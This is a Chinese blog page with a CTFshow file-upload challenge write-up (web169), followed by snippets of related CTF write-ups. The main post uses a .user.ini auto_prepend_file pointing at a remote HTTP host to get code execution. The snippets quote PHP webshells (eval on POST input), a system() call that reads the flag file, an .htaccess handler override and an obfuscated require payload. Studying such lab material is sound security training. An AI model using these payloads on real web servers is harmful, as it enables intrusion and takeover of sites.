CTFshow 文件上传 web169

最新推荐文章于 2024-09-23 21:44:54 发布

Kradress

最新推荐文章于 2024-09-23 21:44:54 发布

阅读量533

点赞数

分类专栏： CTFshow 文章标签： zip上传漏洞远程代码执行 .user.ini 文件包含安全漏洞

本文链接：https://blog.csdn.net/Kracxi/article/details/122975031

版权

CTFshow 专栏收录该内容

194 篇文章 18 订阅

订阅专栏

思路

查看源代码,要求上传zip

上传zip后抓包,返回错误,把文件类型改成image/png,提示null

清空全部内容,提示上传成功,文件后缀也可以任意改

初步尝试发现< > ?都被过滤了,肯定不能直接写php代码了,不过可以上传php文件,就可以利用.user.ini进行日志文件包含和远程文件包含(条件需要当前目录有可执行的php文件,所以先要上传php,内容无关紧要)

.user.ini

auto_prepend_file=http://2002459365

访问上传的php文件,回显成功直接rce拿到flag

总结

…

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Kradress

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

CTFshow 文件上传 web162

Kradress的博客

02-15

2187

目录思路总结思路大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%

CTFshow 文件上传 web163

Kradress的博客

02-16

672

目录源码思路总结源码思路先上传.user.ini 上传成功 GIF89a auto_prepend_file=png 然后上传png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%d6%c4%c0%c1?> 取反脚本 $a = "dat

参与评论您还未登录，请先登录后发表或查看评论

CTF show 文件上传篇（web151-170，看这一篇就够啦）

最新发布

qq_65165505的博客

09-23

1096

涵盖ctfshow文件上传web151-web170，每一关的解题详细步骤及其思路，并且解决了解题过程中可能遇到的bug，如解决蚁剑连接{"code":"UNABLE_TO_VERIFY_LEAF_SIGNATURE"}错误等，几乎每一关也都有我总结的知识点大全，总之就一句话，ctfshow文件上传系列，看我这一篇就够了！！！！

ctfshow文件上传

遇事不决冲冲冲

10-20

3226

web151-前端绕过提示前台校验不可靠，上传png图片，burp抓包修改为php 任意命令执行这里关闭js的话点击上传图片就没有反应了。 web152-后端绕过一模一样的步骤，应该上一题前端判断的做法是修改前端代码吧 web153-.user.ini绕过这里要上传user.ini进行文件上传绕过简单理解就是.user.ini文件中有一个auto_prepend_file = <filename> //包含在文件头配置项，它的作用的是在同目录.php文件中包含<filen

CTFHub-web详解

shayebudon的博客

11-20

3545

信息泄露目录遍历遍历每一个文件夹，找到flag.txt，复制内容提交 PHPINFO 打开页面，从信息中寻找flag。备份文件下载网站源码尝试各种组合，最后发现在网站后添加www.zip后成功下载压缩文件将解压后的文件名放在url后，即可出现flag bak文件下载index.php.bak打开即可看到flag vim缓存当开发人员在线上环境中使用 vim 编辑器，在使用过程中会留下 vim 编辑器缓存，当vim异常退出时，缓存...

CTFShow文件上传

paidx0

08-07

457

CTFShow文件上传 web151 前端直接抓包改就行 web152 同上 web153 利用上传.user.ini进行文件上传绕过 php.ini是php的一个全局配置文件，对整个web服务起作用；而.user.ini和.htaccess一样是目录的配置文件，.user.ini就是用户自定义的一个php.ini，通常用这个文件来构造后门和隐藏后门。 **利用.user.ini，要求目标目录下必须包含php文件** .user.ini的内容为auto_append_file=1.png，意思就是使1

CTFshow web入门——文件上传

热门推荐

小元砸的博客

03-14

1万+

Web 151

CTFshow 文件上传 web153

Kradress的博客

02-15

1837

目录思路总结思路先上传带shell的png文件,上传成功把文件后缀改成php,上传失败,改成xxxxx上传成功,得知是黑名单过滤, 上传phtml后缀,可以成功上传,但是无法解析,可以试试上传配置文件,访问upload,发现有可执行文件index.php,可以用上传.user.ini来进行文件包含(题目是nginx) user.ini.它比.htaccess用的更广，不管是nginx/apache/IIS，只要是以fastcgi运行的php都可以用这个方法。条件: 服务器脚本语言为PHP

CTFshow 文件上传 web164

Kradress的博客

02-16

996

目录思路总结思路直接在burp里面改target和host的值,或者在本地发包多次尝试后,发现除了正常的png图片,都无法上传,猜测用图片马上传 https://github.com/huntergregal/PNG-IDAT-Payload-Generator 虽然上传成功,但把后缀改成任意字符串却被拦截,猜测是白名单 .user.ini也无法正常上传,应该有其他的点可以利用. 直接在网站上上传图片马后,发现显示查看图片点击查看图片后,跳转到/download.php?imag

CTFshow 文件上传 web167

Kradress的博客

02-16

381

目录思路总结思路根据提示上传了包含shell的jpg文件,上传成功,点击下载文件,发现没有存在文件包含点,访问upload检查是否有可执行文件,提示没有权限,但是发现中间件是apache 可以直接上传phtml,但是文件没有被成功解析.这时候可以上传.htaccess,对所有文件进行php解析 <?php echo 123;eval($_POST['kradress']);?> .htaccess Sethandler application/x-httpd-php <!-将该

CTFSHOW WEB_AK赛

羽的博客

07-31

3101

签到_观己既然是签到，那我们就去猜一下flag的位置以及文件名 payload:file=/flag.txt 结束如果猜不到呢，我们只能另寻他法了 1、尝试用伪协议中的data（具体伪协议的用法可参考https://blog.csdn.net/nzjdsds/article/details/82461043）发现allow_url_include没有开启。 2、让file=/var/log/nginx/access.log发现可以读取nginx的日志内容，那我们可以试试日志包含写一句话。（其中日志中有客

CTFshow--web入门--文件上传

qq_46874275的博客

04-24

2254

~目录~开始web151 改后缀 / 禁jsweb152 改后缀web153 .user.iniweb154、155 .user.ini + 短标签web156 {}web157、158、159 反引号执行命令web160 日志包含绕过web161 幻术文件头web162、163 session文件包含+条件竞争开始挑简单的先来 web151 改后缀 / 禁js 上传一个一句话，要求是图片格式，否则传不上去 <?php @eval($_POST['a']) ?> 然后抓包修改后缀为php

ctfshow-web入门-文件上传（web166、web167）&（web168-web170）免杀绕过

Welcome To Myon'Blog !

07-11

1233

查看源码，前端只让传 zip上传 zip 成功后可以进行下载随便搞一个压缩包，使用记事本编辑，在其内容里插入一句话木马：上传该压缩包，上传成功后点击下载文件，使用 burpsuite 抓包：我这里木马内容用的 request ，就在 get 里执行 ls 没什么问题，但是读取 flag 时识别有点问题，最好使用 post 请求，因此将请求方法改为 post ，将 file 的内容还原到上面。

ctfshow WEB入门 文件上传151-170

byname1的博客

01-07

1628

只是过滤了分号，其他同上。php的最后一个分号可以省略。

【Web】CTFSHOW 文件上传刷题记录(全)

uuzeray的博客

01-16

1756

期末考完终于可以好好学ctf了，先把这些该回顾的回顾完，直接rushjava！

ctfshow 文件上传 web151~170

shinygod的博客

03-22

1414

目录web151web 152web 153web 154web 155web 156 web151 上传提示，前端验证上传.jpg文件然后抓包，改文件名为.php,加入一句话木马。 upload/1.php?1=system("cat /var/www/html/flag.php"); web 152 同上，但对Content-Type进行了过滤。 upload/1.php?1=system("cat /var/www/html/flag.php"); web 153 过滤了php，大小写改一

CTFshow——文件上传

D.MIND 的博客

02-23

1482

目录：web151、152——前后端的简单检验web153——.user.ini配置文件web154、155——PHP的其他标记写法web156——{ }代替[ ]web157、158、159——web160—— web151、152——前后端的简单检验发现只能上传PNG文件，上传一个图片马，用Burp抓包修改文件后缀 1.在upload/xx.php页面结合一句话木马 2.用蚁剑、菜刀连接 web153——.user.ini配置文件细看：.htaccess和.user.ini配置文件妙用如

php 写入文件 ctf,php代码审计前奏之ctfshow之文件上传

weixin_33213367的博客

03-10

922

想搞好代码审计，必须要搞懂其中一些危险函数危险应用，以及过滤不足，故以 CTF 来练习。web151~前端验证直接抓包修改后缀。web152~前端+MIME直接抓包修改后缀。web153~.user.ini使用条件：(1)服务器脚本语言为PHP 服务器使用CGI／FastCGI模式(2)上传目录下要有可执行的php文件使用方式：上传一张图片马上传 .user.iniauto_prepend_fil...

ctfshow web入门文件上传

09-29

文件上传是CTF比赛中的一个常见挑战之一。其中一种方法是通过上传包含恶意代码的文件来绕过服务器的文件类型限制。比如，在上传图片时，可以同时上传一个名为.user.ini的文件，并在其中设置auto_append_file参数来...